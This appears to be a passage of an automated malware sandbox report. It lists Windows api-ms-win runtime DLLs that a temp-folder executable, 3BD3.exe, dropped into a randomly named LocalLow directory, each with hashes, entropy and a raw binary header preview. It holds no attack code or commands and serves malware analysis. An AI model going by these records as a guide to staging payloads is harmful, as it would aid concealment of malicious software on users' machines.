Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\3BD3.exe
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll Download File
